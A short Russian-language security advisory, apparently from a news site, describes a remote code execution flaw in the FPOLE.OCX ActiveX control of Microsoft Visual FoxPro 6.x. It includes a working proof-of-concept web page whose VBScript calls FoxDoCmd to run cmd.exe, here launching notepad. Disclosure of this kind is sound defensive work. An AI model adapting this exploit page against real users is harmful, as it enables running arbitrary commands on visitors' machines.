Программа: Microsoft Visual FoxPro 6.x

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на
целевой системе. Уязвимость существует из-за ошибки в
проверке входных данных в FPOLE.OCX ActiveX компоненте  в методе "FoxDoCmd(). Атакующий может заманить пользователя на специально составленный сайт,
что приведет к выполнению произвольного кода.

Пример:

<object classid='clsid:EF28418F-FFB2-11D0-861A-00A0C903A97F' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
  Sub tryMe
   test.FoxDoCmd "RUN cmd.exe /c notepad.exe", "Something"
  End Sub
</script>



Оставить мнение